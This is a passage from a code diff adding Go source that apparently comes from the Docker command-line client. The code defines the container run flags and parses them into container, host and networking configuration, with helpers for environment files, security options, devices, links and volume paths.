+	flags.BoolVar(&copts.readonlyRootfs, "read-only", false, "Mount the container's root filesystem as read only")
+	flags.StringVar(&copts.restartPolicy, "restart", "no", "Restart policy to apply when a container exits")
+	flags.StringVar(&copts.stopSignal, "stop-signal", signal.DefaultStopSignal, fmt.Sprintf("Signal to stop a container, %v by default", signal.DefaultStopSignal))
+	flags.IntVar(&copts.stopTimeout, "stop-timeout", 0, "Timeout (in seconds) to stop a container")
+	flags.SetAnnotation("stop-timeout", "version", []string{"1.25"})
+	flags.Var(copts.sysctls, "sysctl", "Sysctl options")
+	flags.BoolVarP(&copts.tty, "tty", "t", false, "Allocate a pseudo-TTY")
+	flags.Var(copts.ulimits, "ulimit", "Ulimit options")
+	flags.StringVarP(&copts.user, "user", "u", "", "Username or UID (format: <name|uid>[:<group|gid>])")
+	flags.StringVarP(&copts.workingDir, "workdir", "w", "", "Working directory inside the container")
+	flags.BoolVar(&copts.autoRemove, "rm", false, "Automatically remove the container when it exits")
+
+	// Security
+	flags.Var(&copts.capAdd, "cap-add", "Add Linux capabilities")
+	flags.Var(&copts.capDrop, "cap-drop", "Drop Linux capabilities")
+	flags.BoolVar(&copts.privileged, "privileged", false, "Give extended privileges to this container")
+	flags.Var(&copts.securityOpt, "security-opt", "Security Options")
+	flags.StringVar(&copts.usernsMode, "userns", "", "User namespace to use")
+	flags.StringVar(&copts.credentialSpec, "credentialspec", "", "Credential spec for managed service account (Windows only)")
+
+	// Network and port publishing flag
+	flags.Var(&copts.extraHosts, "add-host", "Add a custom host-to-IP mapping (host:ip)")
+	flags.Var(&copts.dns, "dns", "Set custom DNS servers")
+	// We allow for both "--dns-opt" and "--dns-option", although the latter is the recommended way.
+	// This is to be consistent with service create/update
+	flags.Var(&copts.dnsOptions, "dns-opt", "Set DNS options")
+	flags.Var(&copts.dnsOptions, "dns-option", "Set DNS options")
+	flags.MarkHidden("dns-opt")
+	flags.Var(&copts.dnsSearch, "dns-search", "Set custom DNS search domains")
+	flags.Var(&copts.expose, "expose", "Expose a port or a range of ports")
+	flags.StringVar(&copts.ipv4Address, "ip", "", "Container IPv4 address (e.g. 172.30.100.104)")
+	flags.StringVar(&copts.ipv6Address, "ip6", "", "Container IPv6 address (e.g. 2001:db8::33)")
+	flags.Var(&copts.links, "link", "Add link to another container")
+	flags.Var(&copts.linkLocalIPs, "link-local-ip", "Container IPv4/IPv6 link-local addresses")
+	flags.StringVar(&copts.macAddress, "mac-address", "", "Container MAC address (e.g. 92:d0:c6:0a:29:33)")
+	flags.VarP(&copts.publish, "publish", "p", "Publish a container's port(s) to the host")
+	flags.BoolVarP(&copts.publishAll, "publish-all", "P", false, "Publish all exposed ports to random ports")
+	// We allow for both "--net" and "--network", although the latter is the recommended way.
+	flags.StringVar(&copts.netMode, "net", "default", "Connect a container to a network")
+	flags.StringVar(&copts.netMode, "network", "default", "Connect a container to a network")
+	flags.MarkHidden("net")
+	// We allow for both "--net-alias" and "--network-alias", although the latter is the recommended way.
+	flags.Var(&copts.aliases, "net-alias", "Add network-scoped alias for the container")
+	flags.Var(&copts.aliases, "network-alias", "Add network-scoped alias for the container")
+	flags.MarkHidden("net-alias")
+
+	// Logging and storage
+	flags.StringVar(&copts.loggingDriver, "log-driver", "", "Logging driver for the container")
+	flags.StringVar(&copts.volumeDriver, "volume-driver", "", "Optional volume driver for the container")
+	flags.Var(&copts.loggingOpts, "log-opt", "Log driver options")
+	flags.Var(&copts.storageOpt, "storage-opt", "Storage driver options for the container")
+	flags.Var(&copts.tmpfs, "tmpfs", "Mount a tmpfs directory")
+	flags.Var(&copts.volumesFrom, "volumes-from", "Mount volumes from the specified container(s)")
+	flags.VarP(&copts.volumes, "volume", "v", "Bind mount a volume")
+
+	// Health-checking
+	flags.StringVar(&copts.healthCmd, "health-cmd", "", "Command to run to check health")
+	flags.DurationVar(&copts.healthInterval, "health-interval", 0, "Time between running the check (ns|us|ms|s|m|h) (default 0s)")
+	flags.IntVar(&copts.healthRetries, "health-retries", 0, "Consecutive failures needed to report unhealthy")
+	flags.DurationVar(&copts.healthTimeout, "health-timeout", 0, "Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)")
+	flags.BoolVar(&copts.noHealthcheck, "no-healthcheck", false, "Disable any container-specified HEALTHCHECK")
+
+	// Resource management
+	flags.Uint16Var(&copts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)")
+	flags.Var(&copts.blkioWeightDevice, "blkio-weight-device", "Block IO weight (relative device weight)")
+	flags.StringVar(&copts.containerIDFile, "cidfile", "", "Write the container ID to the file")
+	flags.StringVar(&copts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)")
+	flags.StringVar(&copts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)")
+	flags.Int64Var(&copts.cpuCount, "cpu-count", 0, "CPU count (Windows only)")
+	flags.Int64Var(&copts.cpuPercent, "cpu-percent", 0, "CPU percent (Windows only)")
+	flags.Int64Var(&copts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period")
+	flags.Int64Var(&copts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota")
+	flags.Int64Var(&copts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit CPU real-time period in microseconds")
+	flags.Int64Var(&copts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit CPU real-time runtime in microseconds")
+	flags.Int64VarP(&copts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)")
+	flags.Var(&copts.cpus, "cpus", "Number of CPUs")
+	flags.Var(&copts.deviceReadBps, "device-read-bps", "Limit read rate (bytes per second) from a device")
+	flags.Var(&copts.deviceReadIOps, "device-read-iops", "Limit read rate (IO per second) from a device")
+	flags.Var(&copts.deviceWriteBps, "device-write-bps", "Limit write rate (bytes per second) to a device")
+	flags.Var(&copts.deviceWriteIOps, "device-write-iops", "Limit write rate (IO per second) to a device")
+	flags.StringVar(&copts.ioMaxBandwidth, "io-maxbandwidth", "", "Maximum IO bandwidth limit for the system drive (Windows only)")
+	flags.Uint64Var(&copts.ioMaxIOps, "io-maxiops", 0, "Maximum IOps limit for the system drive (Windows only)")
+	flags.StringVar(&copts.kernelMemory, "kernel-memory", "", "Kernel memory limit")
+	flags.StringVarP(&copts.memoryString, "memory", "m", "", "Memory limit")
+	flags.StringVar(&copts.memoryReservation, "memory-reservation", "", "Memory soft limit")
+	flags.StringVar(&copts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap")
+	flags.Int64Var(&copts.swappiness, "memory-swappiness", -1, "Tune container memory swappiness (0 to 100)")
+	flags.BoolVar(&copts.oomKillDisable, "oom-kill-disable", false, "Disable OOM Killer")
+	flags.IntVar(&copts.oomScoreAdj, "oom-score-adj", 0, "Tune host's OOM preferences (-1000 to 1000)")
+	flags.Int64Var(&copts.pidsLimit, "pids-limit", 0, "Tune container pids limit (set -1 for unlimited)")
+
+	// Low-level execution (cgroups, namespaces, ...)
+	flags.StringVar(&copts.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container")
+	flags.StringVar(&copts.ipcMode, "ipc", "", "IPC namespace to use")
+	flags.StringVar(&copts.isolation, "isolation", "", "Container isolation technology")
+	flags.StringVar(&copts.pidMode, "pid", "", "PID namespace to use")
+	flags.StringVar(&copts.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB")
+	flags.StringVar(&copts.utsMode, "uts", "", "UTS namespace to use")
+	flags.StringVar(&copts.runtime, "runtime", "", "Runtime to use for this container")
+
+	flags.BoolVar(&copts.init, "init", false, "Run an init inside the container that forwards signals and reaps processes")
+	flags.StringVar(&copts.initPath, "init-path", "", "Path to the docker-init binary")
+	return copts
+}
+
+// Parse parses the args for the specified command and generates a Config,
+// a HostConfig and returns them with the specified command.
+// If the specified args are not valid, it will return an error.
+func Parse(flags *pflag.FlagSet, copts *ContainerOptions) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
+	var (
+		attachStdin  = copts.attach.Get("stdin")
+		attachStdout = copts.attach.Get("stdout")
+		attachStderr = copts.attach.Get("stderr")
+	)
+
+	// Validate the input mac address
+	if copts.macAddress != "" {
+		if _, err := ValidateMACAddress(copts.macAddress); err != nil {
+			return nil, nil, nil, fmt.Errorf("%s is not a valid mac address", copts.macAddress)
+		}
+	}
+	if copts.stdin {
+		attachStdin = true
+	}
+	// If -a is not set, attach to stdout and stderr
+	if copts.attach.Len() == 0 {
+		attachStdout = true
+		attachStderr = true
+	}
+
+	var err error
+
+	var memory int64
+	if copts.memoryString != "" {
+		memory, err = units.RAMInBytes(copts.memoryString)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+	}
+
+	var memoryReservation int64
+	if copts.memoryReservation != "" {
+		memoryReservation, err = units.RAMInBytes(copts.memoryReservation)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+	}
+
+	var memorySwap int64
+	if copts.memorySwap != "" {
+		if copts.memorySwap == "-1" {
+			memorySwap = -1
+		} else {
+			memorySwap, err = units.RAMInBytes(copts.memorySwap)
+			if err != nil {
+				return nil, nil, nil, err
+			}
+		}
+	}
+
+	var kernelMemory int64
+	if copts.kernelMemory != "" {
+		kernelMemory, err = units.RAMInBytes(copts.kernelMemory)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+	}
+
+	swappiness := copts.swappiness
+	if swappiness != -1 && (swappiness < 0 || swappiness > 100) {
+		return nil, nil, nil, fmt.Errorf("invalid value: %d. Valid memory swappiness range is 0-100", swappiness)
+	}
+
+	var shmSize int64
+	if copts.shmSize != "" {
+		shmSize, err = units.RAMInBytes(copts.shmSize)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+	}
+
+	// TODO FIXME units.RAMInBytes should have a uint64 version
+	var maxIOBandwidth int64
+	if copts.ioMaxBandwidth != "" {
+		maxIOBandwidth, err = units.RAMInBytes(copts.ioMaxBandwidth)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+		if maxIOBandwidth < 0 {
+			return nil, nil, nil, fmt.Errorf("invalid value: %s. Maximum IO Bandwidth must be positive", copts.ioMaxBandwidth)
+		}
+	}
+
+	var binds []string
+	volumes := copts.volumes.GetMap()
+	// add any bind targets to the list of container volumes
+	for bind := range copts.volumes.GetMap() {
+		if arr := volumeSplitN(bind, 2); len(arr) > 1 {
+			// after creating the bind mount we want to delete it from the copts.volumes values because
+			// we do not want bind mounts being committed to image configs
+			binds = append(binds, bind)
+			// We should delete from the map (`volumes`) here, as deleting from copts.volumes will not work if
+			// there are duplicates entries.
+			delete(volumes, bind)
+		}
+	}
+
+	// Can't evaluate options passed into --tmpfs until we actually mount
+	tmpfs := make(map[string]string)
+	for _, t := range copts.tmpfs.GetAll() {
+		if arr := strings.SplitN(t, ":", 2); len(arr) > 1 {
+			tmpfs[arr[0]] = arr[1]
+		} else {
+			tmpfs[arr[0]] = ""
+		}
+	}
+
+	var (
+		runCmd     strslice.StrSlice
+		entrypoint strslice.StrSlice
+	)
+
+	if len(copts.Args) > 0 {
+		runCmd = strslice.StrSlice(copts.Args)
+	}
+
+	if copts.entrypoint != "" {
+		entrypoint = strslice.StrSlice{copts.entrypoint}
+	} else if flags.Changed("entrypoint") {
+		// if `--entrypoint=` is parsed then Entrypoint is reset
+		entrypoint = []string{""}
+	}
+
+	ports, portBindings, err := nat.ParsePortSpecs(copts.publish.GetAll())
+	if err != nil {
+		return nil, nil, nil, err
+	}
+
+	// Merge in exposed ports to the map of published ports
+	for _, e := range copts.expose.GetAll() {
+		if strings.Contains(e, ":") {
+			return nil, nil, nil, fmt.Errorf("invalid port format for --expose: %s", e)
+		}
+		//support two formats for expose, original format <portnum>/[<proto>] or <startport-endport>/[<proto>]
+		proto, port := nat.SplitProtoPort(e)
+		//parse the start and end port and create a sequence of ports to expose
+		//if expose a port, the start and end port are the same
+		start, end, err := nat.ParsePortRange(port)
+		if err != nil {
+			return nil, nil, nil, fmt.Errorf("invalid range format for --expose: %s, error: %s", e, err)
+		}
+		for i := start; i <= end; i++ {
+			p, err := nat.NewPort(proto, strconv.FormatUint(i, 10))
+			if err != nil {
+				return nil, nil, nil, err
+			}
+			if _, exists := ports[p]; !exists {
+				ports[p] = struct{}{}
+			}
+		}
+	}
+
+	// parse device mappings
+	deviceMappings := []container.DeviceMapping{}
+	for _, device := range copts.devices.GetAll() {
+		deviceMapping, err := ParseDevice(device)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+		deviceMappings = append(deviceMappings, deviceMapping)
+	}
+
+	// collect all the environment variables for the container
+	envVariables, err := ReadKVStrings(copts.envFile.GetAll(), copts.env.GetAll())
+	if err != nil {
+		return nil, nil, nil, err
+	}
+
+	// collect all the labels for the container
+	labels, err := ReadKVStrings(copts.labelsFile.GetAll(), copts.labels.GetAll())
+	if err != nil {
+		return nil, nil, nil, err
+	}
+
+	ipcMode := container.IpcMode(copts.ipcMode)
+	if !ipcMode.Valid() {
+		return nil, nil, nil, fmt.Errorf("--ipc: invalid IPC mode")
+	}
+
+	pidMode := container.PidMode(copts.pidMode)
+	if !pidMode.Valid() {
+		return nil, nil, nil, fmt.Errorf("--pid: invalid PID mode")
+	}
+
+	utsMode := container.UTSMode(copts.utsMode)
+	if !utsMode.Valid() {
+		return nil, nil, nil, fmt.Errorf("--uts: invalid UTS mode")
+	}
+
+	usernsMode := container.UsernsMode(copts.usernsMode)
+	if !usernsMode.Valid() {
+		return nil, nil, nil, fmt.Errorf("--userns: invalid USER mode")
+	}
+
+	restartPolicy, err := ParseRestartPolicy(copts.restartPolicy)
+	if err != nil {
+		return nil, nil, nil, err
+	}
+
+	loggingOpts, err := parseLoggingOpts(copts.loggingDriver, copts.loggingOpts.GetAll())
+	if err != nil {
+		return nil, nil, nil, err
+	}
+
+	securityOpts, err := parseSecurityOpts(copts.securityOpt.GetAll())
+	if err != nil {
+		return nil, nil, nil, err
+	}
+
+	storageOpts, err := parseStorageOpts(copts.storageOpt.GetAll())
+	if err != nil {
+		return nil, nil, nil, err
+	}
+
+	// Healthcheck
+	var healthConfig *container.HealthConfig
+	haveHealthSettings := copts.healthCmd != "" ||
+		copts.healthInterval != 0 ||
+		copts.healthTimeout != 0 ||
+		copts.healthRetries != 0
+	if copts.noHealthcheck {
+		if haveHealthSettings {
+			return nil, nil, nil, fmt.Errorf("--no-healthcheck conflicts with --health-* options")
+		}
+		test := strslice.StrSlice{"NONE"}
+		healthConfig = &container.HealthConfig{Test: test}
+	} else if haveHealthSettings {
+		var probe strslice.StrSlice
+		if copts.healthCmd != "" {
+			args := []string{"CMD-SHELL", copts.healthCmd}
+			probe = strslice.StrSlice(args)
+		}
+		if copts.healthInterval < 0 {
+			return nil, nil, nil, fmt.Errorf("--health-interval cannot be negative")
+		}
+		if copts.healthTimeout < 0 {
+			return nil, nil, nil, fmt.Errorf("--health-timeout cannot be negative")
+		}
+
+		healthConfig = &container.HealthConfig{
+			Test:     probe,
+			Interval: copts.healthInterval,
+			Timeout:  copts.healthTimeout,
+			Retries:  copts.healthRetries,
+		}
+	}
+
+	resources := container.Resources{
+		CgroupParent:         copts.cgroupParent,
+		Memory:               memory,
+		MemoryReservation:    memoryReservation,
+		MemorySwap:           memorySwap,
+		MemorySwappiness:     &copts.swappiness,
+		KernelMemory:         kernelMemory,
+		OomKillDisable:       &copts.oomKillDisable,
+		NanoCPUs:             copts.cpus.Value(),
+		CPUCount:             copts.cpuCount,
+		CPUPercent:           copts.cpuPercent,
+		CPUShares:            copts.cpuShares,
+		CPUPeriod:            copts.cpuPeriod,
+		CpusetCpus:           copts.cpusetCpus,
+		CpusetMems:           copts.cpusetMems,
+		CPUQuota:             copts.cpuQuota,
+		CPURealtimePeriod:    copts.cpuRealtimePeriod,
+		CPURealtimeRuntime:   copts.cpuRealtimeRuntime,
+		PidsLimit:            copts.pidsLimit,
+		BlkioWeight:          copts.blkioWeight,
+		BlkioWeightDevice:    copts.blkioWeightDevice.GetList(),
+		BlkioDeviceReadBps:   copts.deviceReadBps.GetList(),
+		BlkioDeviceWriteBps:  copts.deviceWriteBps.GetList(),
+		BlkioDeviceReadIOps:  copts.deviceReadIOps.GetList(),
+		BlkioDeviceWriteIOps: copts.deviceWriteIOps.GetList(),
+		IOMaximumIOps:        copts.ioMaxIOps,
+		IOMaximumBandwidth:   uint64(maxIOBandwidth),
+		Ulimits:              copts.ulimits.GetList(),
+		Devices:              deviceMappings,
+	}
+
+	config := &container.Config{
+		Hostname:     copts.hostname,
+		ExposedPorts: ports,
+		User:         copts.user,
+		Tty:          copts.tty,
+		// TODO: deprecated, it comes from -n, --networking
+		// it's still needed internally to set the network to disabled
+		// if e.g. bridge is none in daemon opts, and in inspect
+		NetworkDisabled: false,
+		OpenStdin:       copts.stdin,
+		AttachStdin:     attachStdin,
+		AttachStdout:    attachStdout,
+		AttachStderr:    attachStderr,
+		Env:             envVariables,
+		Cmd:             runCmd,
+		Image:           copts.Image,
+		Volumes:         volumes,
+		MacAddress:      copts.macAddress,
+		Entrypoint:      entrypoint,
+		WorkingDir:      copts.workingDir,
+		Labels:          ConvertKVStringsToMap(labels),
+		Healthcheck:     healthConfig,
+	}
+	if flags.Changed("stop-signal") {
+		config.StopSignal = copts.stopSignal
+	}
+	if flags.Changed("stop-timeout") {
+		config.StopTimeout = &copts.stopTimeout
+	}
+
+	hostConfig := &container.HostConfig{
+		Binds:           binds,
+		ContainerIDFile: copts.containerIDFile,
+		OomScoreAdj:     copts.oomScoreAdj,
+		AutoRemove:      copts.autoRemove,
+		Privileged:      copts.privileged,
+		PortBindings:    portBindings,
+		Links:           copts.links.GetAll(),
+		PublishAllPorts: copts.publishAll,
+		// Make sure the dns fields are never nil.
+		// New containers don't ever have those fields nil,
+		// but pre created containers can still have those nil values.
+		// See https://github.com/docker/docker/pull/17779
+		// for a more detailed explanation on why we don't want that.
+		DNS:            copts.dns.GetAllOrEmpty(),
+		DNSSearch:      copts.dnsSearch.GetAllOrEmpty(),
+		DNSOptions:     copts.dnsOptions.GetAllOrEmpty(),
+		ExtraHosts:     copts.extraHosts.GetAll(),
+		VolumesFrom:    copts.volumesFrom.GetAll(),
+		NetworkMode:    container.NetworkMode(copts.netMode),
+		IpcMode:        ipcMode,
+		PidMode:        pidMode,
+		UTSMode:        utsMode,
+		UsernsMode:     usernsMode,
+		CapAdd:         strslice.StrSlice(copts.capAdd.GetAll()),
+		CapDrop:        strslice.StrSlice(copts.capDrop.GetAll()),
+		GroupAdd:       copts.groupAdd.GetAll(),
+		RestartPolicy:  restartPolicy,
+		SecurityOpt:    securityOpts,
+		StorageOpt:     storageOpts,
+		ReadonlyRootfs: copts.readonlyRootfs,
+		LogConfig:      container.LogConfig{Type: copts.loggingDriver, Config: loggingOpts},
+		VolumeDriver:   copts.volumeDriver,
+		Isolation:      container.Isolation(copts.isolation),
+		ShmSize:        shmSize,
+		Resources:      resources,
+		Tmpfs:          tmpfs,
+		Sysctls:        copts.sysctls.GetAll(),
+		Runtime:        copts.runtime,
+	}
+
+	// only set this value if the user provided the flag, else it should default to nil
+	if flags.Changed("init") {
+		hostConfig.Init = &copts.init
+	}
+
+	// When allocating stdin in attached mode, close stdin at client disconnect
+	if config.OpenStdin && config.AttachStdin {
+		config.StdinOnce = true
+	}
+
+	networkingConfig := &networktypes.NetworkingConfig{
+		EndpointsConfig: make(map[string]*networktypes.EndpointSettings),
+	}
+
+	if copts.ipv4Address != "" || copts.ipv6Address != "" || copts.linkLocalIPs.Len() > 0 {
+		epConfig := &networktypes.EndpointSettings{}
+		networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig
+
+		epConfig.IPAMConfig = &networktypes.EndpointIPAMConfig{
+			IPv4Address: copts.ipv4Address,
+			IPv6Address: copts.ipv6Address,
+		}
+
+		if copts.linkLocalIPs.Len() > 0 {
+			epConfig.IPAMConfig.LinkLocalIPs = make([]string, copts.linkLocalIPs.Len())
+			copy(epConfig.IPAMConfig.LinkLocalIPs, copts.linkLocalIPs.GetAll())
+		}
+	}
+
+	if hostConfig.NetworkMode.IsUserDefined() && len(hostConfig.Links) > 0 {
+		epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)]
+		if epConfig == nil {
+			epConfig = &networktypes.EndpointSettings{}
+		}
+		epConfig.Links = make([]string, len(hostConfig.Links))
+		copy(epConfig.Links, hostConfig.Links)
+		networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig
+	}
+
+	if copts.aliases.Len() > 0 {
+		epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)]
+		if epConfig == nil {
+			epConfig = &networktypes.EndpointSettings{}
+		}
+		epConfig.Aliases = make([]string, copts.aliases.Len())
+		copy(epConfig.Aliases, copts.aliases.GetAll())
+		networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig
+	}
+
+	return config, hostConfig, networkingConfig, nil
+}
+
+// ReadKVStrings reads a file of line terminated key=value pairs, and overrides any keys
+// present in the file with additional pairs specified in the override parameter
+func ReadKVStrings(files []string, override []string) ([]string, error) {
+	envVariables := []string{}
+	for _, ef := range files {
+		parsedVars, err := ParseEnvFile(ef)
+		if err != nil {
+			return nil, err
+		}
+		envVariables = append(envVariables, parsedVars...)
+	}
+	// parse the '-e' and '--env' after, to allow override
+	envVariables = append(envVariables, override...)
+
+	return envVariables, nil
+}
+
+// ConvertKVStringsToMap converts ["key=value"] to {"key":"value"}
+func ConvertKVStringsToMap(values []string) map[string]string {
+	result := make(map[string]string, len(values))
+	for _, value := range values {
+		kv := strings.SplitN(value, "=", 2)
+		if len(kv) == 1 {
+			result[kv[0]] = ""
+		} else {
+			result[kv[0]] = kv[1]
+		}
+	}
+
+	return result
+}
+
+// ConvertKVStringsToMapWithNil converts ["key=value"] to {"key":"value"}
+// but set unset keys to nil - meaning the ones with no "=" in them.
+// We use this in cases where we need to distinguish between
+//   FOO=  and FOO
+// where the latter case just means FOO was mentioned but not given a value
+func ConvertKVStringsToMapWithNil(values []string) map[string]*string {
+	result := make(map[string]*string, len(values))
+	for _, value := range values {
+		kv := strings.SplitN(value, "=", 2)
+		if len(kv) == 1 {
+			result[kv[0]] = nil
+		} else {
+			result[kv[0]] = &kv[1]
+		}
+	}
+
+	return result
+}
+
+func parseLoggingOpts(loggingDriver string, loggingOpts []string) (map[string]string, error) {
+	loggingOptsMap := ConvertKVStringsToMap(loggingOpts)
+	if loggingDriver == "none" && len(loggingOpts) > 0 {
+		return map[string]string{}, fmt.Errorf("invalid logging opts for driver %s", loggingDriver)
+	}
+	return loggingOptsMap, nil
+}
+
+// takes a local seccomp daemon, reads the file contents for sending to the daemon
+func parseSecurityOpts(securityOpts []string) ([]string, error) {
+	for key, opt := range securityOpts {
+		con := strings.SplitN(opt, "=", 2)
+		if len(con) == 1 && con[0] != "no-new-privileges" {
+			if strings.Contains(opt, ":") {
+				con = strings.SplitN(opt, ":", 2)
+			} else {
+				return securityOpts, fmt.Errorf("Invalid --security-opt: %q", opt)
+			}
+		}
+		if con[0] == "seccomp" && con[1] != "unconfined" {
+			f, err := ioutil.ReadFile(con[1])
+			if err != nil {
+				return securityOpts, fmt.Errorf("opening seccomp profile (%s) failed: %v", con[1], err)
+			}
+			b := bytes.NewBuffer(nil)
+			if err := json.Compact(b, f); err != nil {
+				return securityOpts, fmt.Errorf("compacting json for seccomp profile (%s) failed: %v", con[1], err)
+			}
+			securityOpts[key] = fmt.Sprintf("seccomp=%s", b.Bytes())
+		}
+	}
+
+	return securityOpts, nil
+}
+
+// parses storage options per container into a map
+func parseStorageOpts(storageOpts []string) (map[string]string, error) {
+	m := make(map[string]string)
+	for _, option := range storageOpts {
+		if strings.Contains(option, "=") {
+			opt := strings.SplitN(option, "=", 2)
+			m[opt[0]] = opt[1]
+		} else {
+			return nil, fmt.Errorf("invalid storage option")
+		}
+	}
+	return m, nil
+}
+
+// ParseRestartPolicy returns the parsed policy or an error indicating what is incorrect
+func ParseRestartPolicy(policy string) (container.RestartPolicy, error) {
+	p := container.RestartPolicy{}
+
+	if policy == "" {
+		return p, nil
+	}
+
+	parts := strings.Split(policy, ":")
+
+	if len(parts) > 2 {
+		return p, fmt.Errorf("invalid restart policy format")
+	}
+	if len(parts) == 2 {
+		count, err := strconv.Atoi(parts[1])
+		if err != nil {
+			return p, fmt.Errorf("maximum retry count must be an integer")
+		}
+
+		p.MaximumRetryCount = count
+	}
+
+	p.Name = parts[0]
+
+	return p, nil
+}
+
+// ParseDevice parses a device mapping string to a container.DeviceMapping struct
+func ParseDevice(device string) (container.DeviceMapping, error) {
+	src := ""
+	dst := ""
+	permissions := "rwm"
+	arr := strings.Split(device, ":")
+	switch len(arr) {
+	case 3:
+		permissions = arr[2]
+		fallthrough
+	case 2:
+		if ValidDeviceMode(arr[1]) {
+			permissions = arr[1]
+		} else {
+			dst = arr[1]
+		}
+		fallthrough
+	case 1:
+		src = arr[0]
+	default:
+		return container.DeviceMapping{}, fmt.Errorf("invalid device specification: %s", device)
+	}
+
+	if dst == "" {
+		dst = src
+	}
+
+	deviceMapping := container.DeviceMapping{
+		PathOnHost:        src,
+		PathInContainer:   dst,
+		CgroupPermissions: permissions,
+	}
+	return deviceMapping, nil
+}
+
+// ParseLink parses and validates the specified string as a link format (name:alias)
+func ParseLink(val string) (string, string, error) {
+	if val == "" {
+		return "", "", fmt.Errorf("empty string specified for links")
+	}
+	arr := strings.Split(val, ":")
+	if len(arr) > 2 {
+		return "", "", fmt.Errorf("bad format for links: %s", val)
+	}
+	if len(arr) == 1 {
+		return val, val, nil
+	}
+	// This is kept because we can actually get a HostConfig with links
+	// from an already created container and the format is not `foo:bar`
+	// but `/foo:/c1/bar`
+	if strings.HasPrefix(arr[0], "/") {
+		_, alias := path.Split(arr[1])
+		return arr[0][1:], alias, nil
+	}
+	return arr[0], arr[1], nil
+}
+
+// ValidateLink validates that the specified string has a valid link format (containerName:alias).
+func ValidateLink(val string) (string, error) {
+	if _, _, err := ParseLink(val); err != nil {
+		return val, err
+	}
+	return val, nil
+}
+
+// ValidDeviceMode checks if the mode for device is valid or not.
+// Valid mode is a composition of r (read), w (write), and m (mknod).
+func ValidDeviceMode(mode string) bool {
+	var legalDeviceMode = map[rune]bool{
+		'r': true,
+		'w': true,
+		'm': true,
+	}
+	if mode == "" {
+		return false
+	}
+	for _, c := range mode {
+		if !legalDeviceMode[c] {
+			return false
+		}
+		legalDeviceMode[c] = false
+	}
+	return true
+}
+
+// ValidateDevice validates a path for devices
+// It will make sure 'val' is in the form:
+//    [host-dir:]container-path[:mode]
+// It also validates the device mode.
+func ValidateDevice(val string) (string, error) {
+	return validatePath(val, ValidDeviceMode)
+}
+
+func validatePath(val string, validator func(string) bool) (string, error) {
+	var containerPath string
+	var mode string
+
+	if strings.Count(val, ":") > 2 {
+		return val, fmt.Errorf("bad format for path: %s", val)
+	}
+
+	split := strings.SplitN(val, ":", 3)
+	if split[0] == "" {
+		return val, fmt.Errorf("bad format for path: %s", val)
+	}
+	switch len(split) {
+	case 1:
+		containerPath = split[0]
+		val = path.Clean(containerPath)
+	case 2:
+		if isValid := validator(split[1]); isValid {
+			containerPath = split[0]
+			mode = split[1]
+			val = fmt.Sprintf("%s:%s", path.Clean(containerPath), mode)
+		} else {
+			containerPath = split[1]
+			val = fmt.Sprintf("%s:%s", split[0], path.Clean(containerPath))
+		}
+	case 3:
+		containerPath = split[1]
+		mode = split[2]
+		if isValid := validator(split[2]); !isValid {
+			return val, fmt.Errorf("bad mode specified: %s", mode)
+		}
+		val = fmt.Sprintf("%s:%s:%s", split[0], containerPath, mode)
+	}
+
+	if !path.IsAbs(containerPath) {
+		return val, fmt.Errorf("%s is not an absolute path", containerPath)
+	}
+	return val, nil
+}
+
+// volumeSplitN splits raw into a maximum of n parts, separated by a separator colon.
+// A separator colon is the last `:` character in the regex `[:\\]?[a-zA-Z]:` (note `\\` is `\` escaped).
+// In Windows driver letter appears in two situations:
+// a. `^[a-zA-Z]:` (A colon followed  by `^[a-zA-Z]:` is OK as colon is the separator in volume option)
+// b. A string in the format like `\\?\C:\Windows\...` (UNC).
+// Therefore, a driver letter can only follow either a `:` or `\\`
+// This allows to correctly split strings such as `C:\foo:D:\:rw` or `/tmp/q:/foo`.
+func volumeSplitN(raw string, n int) []string {
+	var array []string
+	if len(raw) == 0 || raw[0] == ':' {
+		// invalid
+		return nil
+	}
+	// numberOfParts counts the number of parts separated by a separator colon
+	numberOfParts := 0
+	// left represents the left-most cursor in raw, updated at every `:` character considered as a separator.
+	left := 0
+	// right represents the right-most cursor in raw incremented with the loop. Note this
+	// starts at index 1 as index 0 is already handle above as a special case.
+	for right := 1; right < len(raw); right++ {
+		// stop parsing if reached maximum number of parts
+		if n >= 0 && numberOfParts >= n {
+			break
+		}
+		if raw[right] != ':' {
+			continue
+		}
+		potentialDriveLetter := raw[right-1]
+		if (potentialDriveLetter >= 'A' && potentialDriveLetter <= 'Z') || (potentialDriveLetter >= 'a' && potentialDriveLetter <= 'z') {
+			if right > 1 {
+				beforePotentialDriveLetter := raw[right-2]
+				// Only `:` or `\\` are checked (`/` could fall into the case of `/tmp/q:/foo`)
+				if beforePotentialDriveLetter != ':' && beforePotentialDriveLetter != '\\' {
+					// e.g. `C:` is not preceded by any delimiter, therefore it was not a drive letter but a path ending with `C:`.
+					array = append(array, raw[left:right])
+					left = right + 1
+					numberOfParts++
+				}
+				// else, `C:` is considered as a drive letter and not as a delimiter, so we continue parsing.
+			}
+			// if right == 1, then `C:` is the beginning of the raw string, therefore `:` is again not considered a delimiter and we continue parsing.
+		} else {
